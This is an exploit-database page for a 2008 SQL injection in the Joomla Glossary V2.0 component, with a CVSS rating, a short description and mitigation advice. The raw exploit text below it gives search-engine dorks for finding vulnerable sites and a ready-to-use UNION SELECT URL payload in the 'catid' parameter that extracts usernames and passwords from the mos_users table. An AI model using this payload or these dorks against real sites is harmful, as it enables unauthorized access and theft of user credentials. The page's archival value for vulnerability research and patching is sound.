header-logo
Suggest Exploit
vendor:
Glossary
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Glossary
Affected Version From: V2.0
Affected Version To: V2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:glossary
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla(Glossary V2.0) SQL Injection(com_glossary)

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains a malicious SQL query in the 'catid' parameter of the 'index.php' script. This can allow an attacker to gain access to sensitive information from the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

#########################################################################
#
# joomla(Glossary V2.0) SQL Injection(com_glossary)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_glossary"
#
dork 2 : Glossary V2.0 (exploit working html sites)

########################################################################
EXPLOIT :

index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--

#########################################################################
# S@BUN                 www.hackturkiye.com                S@BUN
#########################################################################
# S@BUN                       GOOD LUCKY                     S@BUN
######################################################################### 

# milw0rm.com [2008-01-30]